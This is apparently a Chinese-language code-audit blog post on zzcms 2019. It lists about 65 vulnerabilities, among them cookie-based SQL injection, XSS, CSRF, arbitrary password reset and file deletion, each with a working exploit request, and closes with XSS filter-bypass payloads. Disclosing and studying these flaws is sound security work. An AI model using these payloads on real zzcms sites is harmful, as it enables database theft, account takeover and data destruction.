代码审计:zzcms 2019

发布于:2024-08-02 ⋅ 阅读:(36) ⋅ 点赞:(0)

代码审计:zzcms 2019

漏洞列表如下(共计65个漏洞,附Exp,按时间顺序):
未完待续…

1、install/index.php 8行处存在变量覆盖漏洞(影响install/step_6.php) Exp:http://127.0.0.3/install/index.php Post:admin=<script>alert(1)</script>&step=6
2、bluecms/admin/login.php 31行处存在Cookie用户名密码明文传输漏洞 e.g. Cookie:PHPSESSID=k1lsech0g94r1mg7uh4rf5ado6; admin=admin; pass=21232f297a57a5a743894a0e4a801fc3;
3、uploadimg_form.php 64行处存在反射型XSS漏洞 Exp:http://127.0.0.3/uploadimg_form.php?noshuiyin="/><script>alert(1);</script>
4、uploadimg_form.php 65行处存在反射型XSS漏洞 Exp:http://127.0.0.3/uploadimg_form.php?imgid="/><script>alert(1);</script>
5、uploadimg_form.php 75行处存在反射型XSS漏洞 Exp:http://127.0.0.3/uploadimg_form.php Post:flvurl=');</script><?php phpinfo(); ?><script>alert('1
7、ask/caina.php 21行处存在反射型XSS漏洞 Exp:http://127.0.0.3/ask/caina.php Referer:127.0.0.3";alert(1);parent.location="
8、ask/search.php 48行处存在sql注入漏洞 Exp:http://127.0.0.3/ask/search.php Cookie:askb=1' union SELECT 1,2,user(),4,5,6,7,8,9,10,11 limit 1,1#
9、ask/search.php 56行处存在sql注入漏洞 Exp:http://127.0.0.3/ask/search.php Cookie:asks=1' union SELECT 1,2,user(),4,5,6,7,8,9,10,11 limit 1,1#
10、ask/search.php 167行处存在Sql注入漏洞(存疑) Exp:http://127.0.0.3/ask/search.php Cookie:page_size_ask=1%3BINSERT INTO zzcms_ask (id, bigclassid,bigclassname,smallclassid,smallclassname,title,content,img,jifen,editor,sendtime,hit,elite,typeid,passed) VALUES (2,1,1,2,3,user(),'ggg',1,0,'hhh','2024-07-31 00:33:55',1,1,1,1) %3B
11、inc/function.php 109行存在IP伪造漏洞
12、ask/show.php 114行处存在反射型XSS漏洞(存疑) Exp:http://127.0.0.3/ask/show.php Post:id=1 Cookie:UserName="/><script>alert(1);</script><input name="hh" value="1
13、baojia/baojiaadd.php 174行存在sql注入漏洞 Exp:http://127.0.0.3/baojia/baojiaadd.php Cookie:UserName=1' union select 1,2,3,4,5,6,7,user(),9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8 limit 0,1#
14、baojia/search.php 119行处存在sql注入漏洞 Exp:http://127.0.0.3/baojia/search.php Cookie:b=' union select user(),1#
15、baojia/search.php 258行处存在sql注入漏洞 Exp:http://127.0.0.3/baojia/search.php Cookie:keyword=' union select user() limit 1,1#
16、baojia/search.php 258行处存在sql注入漏洞 Exp:http://127.0.0.3/baojia/search.php Cookie:province='  union select user() limit 1,1#
17、baojia/search.php 258行处存在sql注入漏洞 Exp:http://127.0.0.3/baojia/search.php Cookie:city='  union select user() limit 1,1#
18、baojia/search.php 258行处存在sql注入漏洞 Exp:http://127.0.0.3/baojia/search.php Cookie:xiancheng='  union select user() limit 1,1#
19、baojia/search.php 258行处存在反射型XSS漏洞 Exp:http://127.0.0.3/baojia/search.php Cookie:keyword="/><script>alert(1)</script><meta name="keywords1" content="
20、baojia/search.php 258行处存在反射型XSS漏洞 Exp:http://127.0.0.3/baojia/search.php Cookie:province="/><script>alert(1)</script><meta name="keywords1" content="
21、baojia/search.php 258行处存在反射型XSS漏洞 Exp:http://127.0.0.3/baojia/search.php Cookie:city="/><script>alert(1)</script><meta name="keywords1" content="
22、baojia/search.php 258行处存在反射型XSS漏洞 Exp:http://127.0.0.3/baojia/search.php Cookie:xiancheng="/><script>alert(1)</script><meta name="keywords1" content="
23、company/search.php 119行处存在sql注入漏洞 Exp:http://127.0.0.3/company/search.php Cookie:b=' union select user(),1#
24、company/search.php 136行处存在sql注入漏洞 Exp:http://127.0.0.3/company/search.php Cookie:companyb=1' union select 1,2,user(),4,5,6,7,8,9,10,11 limit 1,1#
25、company/search.php 136行处存在sql注入漏洞 Exp:http://127.0.0.3/company/search.php Cookie:companys=1' union select 1,2,user(),4,5,6,7,8,9,10,11 limit 1,1#
26、company/search.php 308行处存在sql注入漏洞 Exp:http://127.0.0.3/company/search.php Cookie:province='  union select user() limit 1,1#
27、company/search.php 308行处存在sql注入漏洞 Exp:http://127.0.0.3/company/search.php Cookie:city='  union select user() limit 1,1#
28、company/search.php 308行处存在sql注入漏洞 Exp:http://127.0.0.3/company/search.php Cookie:xiancheng='  union select user() limit 1,1#
29、baojia/search.php 308行处存在反射型XSS漏洞 Exp:http://127.0.0.3/company/search.php Cookie:province="/><script>alert(1)</script><meta name="keywords1" content="
30、baojia/search.php 308行处存在反射型XSS漏洞 Exp:http://127.0.0.3/company/search.php Cookie:city="/><script>alert(1)</script><meta name="keywords1" content="
31、baojia/search.php 308行处存在反射型XSS漏洞 Exp:http://127.0.0.3/company/search.php Cookie:xiancheng="/><script>alert(1)</script><meta name="keywords1" content="
32、baojia/searchform.php 74行处存在反射型XSS漏洞 Exp:http://127.0.0.3/company/searchform.php Cookie:companyb="/><script>alert(1)</script><meta name="keywords1" content="
33、inc/function.php 956行处存在用户伪造漏洞 Exp:Cookie:UserName=admin
34、dl/dl_download.php 36行处存在sql注入漏洞 Exp:http://127.0.0.3/dl/dl_download.php Cookie:UserName=' union select concat(999,user()) #
35、dl/dl_sendsms.php 77行处存在sql注入漏洞(理论上) Exp:http://127.0.0.3/dl/dl_sendsms.php Cookie:dlid=1' union select user()  #
36、dl/dladd.php 174行存在sql注入漏洞 Exp:http://127.0.0.3/dl/dladd.php Cookie:UserName=' union select 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,user(),8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8 #
37、dl/search.php 存在8个漏洞,与baojia/search.php的漏洞类似,不再重复
38、job中出现的漏洞与baojia里类似,不再重复
39、pp中出现的漏洞与baojia里类似,不再重复
40、special中出现的漏洞与baojia里类似,不再重复
41、zs中出现的漏洞与baojia里类似,不再重复
42、zh中出现的漏洞与baojia里类似,不再重复
43、wangkan中出现的漏洞与baojia里类似,不再重复
44、one/getpassword.php 第73行存在更改任意用户密码漏洞 Exp:http://127.0.0.3/one/getpassword.php Post:action=step3&username=admin&passwordtrue=admin888
45、zs/dl_liuyan_save.php 第52行存在CSRF漏洞 Exp:http://127.0.0.3/zs/dl_liuyan_save.php Post:token=1&name=a Cookie:token=1 Referer:baidu.com";alert(1);parent.location="
46、zs/dl_liuyan_save.php 第52行存在反射型XSS漏洞 Exp:http://127.0.0.3/zs/dl_liuyan_save.php Post:token=1&name=a Cookie:token=1 Referer:baidu.com";alert(1);parent.location="
47、zs/dl_liuyan_save.php 第53行存在CSRF漏洞 Exp:http://127.0.0.3/zs/dl_liuyan_save.php Post:token=1&tel=a Cookie:token=1 Referer:baidu.com";alert(1);parent.location="
48、zs/dl_liuyan_save.php 第53行存在反射型XSS漏洞 Exp:http://127.0.0.3/zs/dl_liuyan_save.php Post:token=1&tel=a Cookie:token=1 Referer:baidu.com";alert(1);parent.location="
49、ask/caina.php 21行处存在CSRF漏洞 Exp:http://127.0.0.3/ask/caina.php Referer:baidu.com";alert(1);parent.location="
50、zs/dl_liuyan_save.php 第111行存在CSRF漏洞 Exp:http://127.0.0.3/zs/dl_liuyan_save.php Post:token=1&name=a Cookie:token=1 Referer:baidu.com";alert(1);parent.location="
51、zs/dl_liuyan_save.php 第111行存在反射型XSS漏洞 Exp:http://127.0.0.3/zs/dl_liuyan_save.php Post:token=1&name=a Cookie:token=1 Referer:baidu.com";alert(1);parent.location="
52、zt/top.php 第21行存在sql注入漏洞(理论上),同样影响zt/adv.php Exp:http://'+union+select+1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,user()#.1.com/zt/top.php
53、reg/sendmailagain.php 第40行存在查看临时用户密码漏洞 Exp:http://127.0.0.3/reg/sendmailagain.php Post:username=admin&newemail=1@qq.com
54、user/adv.php 第52行存在任意图片文件删除漏洞 Exp:http://127.0.0.3/user/adv.php Post:action=modify&img=http://127.0.0.3/1.php;jpg&oldimg=test/../uploadfiles/../image/h.gif
55、user/adv2.php 第67行存在sql注入漏洞 Exp:http://127.0.0.3/user/adv2.php Post:action=modify&id=0 union select 1,2,3,4,5,6,7,8,9,user(),1,2,3,4 #
56、user/login.php 第111行存在反射型XSS漏洞 Exp:http://127.0.0.3/user/login.php Cookie:UserName=</span></div><script>alert(1)</script><div><span>
57、user/adv.php 第120行存在反射型XSS漏洞 Exp:http://127.0.0.3/user/adv.php Post:action=add&advlink=' οnclick=alert(1) '&adv=123
58、admin/ad_user_manage.php 第52行存在二次注入漏洞 Exp1:http://127.0.0.3/admin/ad_user_manage.php?action=pass Post:id=1  Exp2:http://127.0.0.3/user/adv.php Post:action=add&advlink=hhh&adv=123&img=',title=user() #
59、zh/show.php 第29行存在储存型XSS漏洞(由stripfxg函数导致) Exp:http://127.0.0.3/zh/show.php?id=1
60、admin/dl_data.php 第19行存在任意文件删除漏洞 Exp:http://127.0.0.3/admin/dl_data.php?action=del&filename=../1.php
61/user/ask.php 第20行存在存储型XSS漏洞(由markit()导致,在后台查看不良操作记录时触发) Exp:http://127.0.0.3/user/ask.php?do=modify&page=1&id=1&aaa=<sCrIpT>alert(/xss/)</ScRiPt>
62、install/index.php 第21行存在网站重装漏洞 http://127.0.0.3/install/index.php Post:step=2
63、admin/deluser.php 第19行存在任意文件删除漏洞
64、admin/del.php 第19行存在任意目录删除漏洞
65、admin/uploadfile_nouse.php 第19行存在任意文件删除漏洞

请添加图片描述
请添加图片描述

在这里插入图片描述
在这里插入图片描述

//当存在Get、Post的时候才执行这个语句,导致Cookie逃逸 或者利用变量覆盖
if($_REQUEST){
	$_POST =zc_check($_POST);
	$_GET =zc_check($_GET);
	$_COOKIE =zc_check($_COOKIE);
	@extract($_POST);
	@extract($_GET);
}



//在user/del.php 中,若能控制数据库中任意一个表的img参数,则可实现任意文件删除

// "/><?php phpinfo();?><meta name="keywords1" content="

//htmlspecialchars() 默认只编码双引号,虽然不能用双引号和<> 但是可以用 ‘,所以我
们的单引号很可能可以用。
//<scri<!--test-->pt>alert(111)</sc<!--test-->ript>
//<SCrIpt>alert(1)</SCrIpt>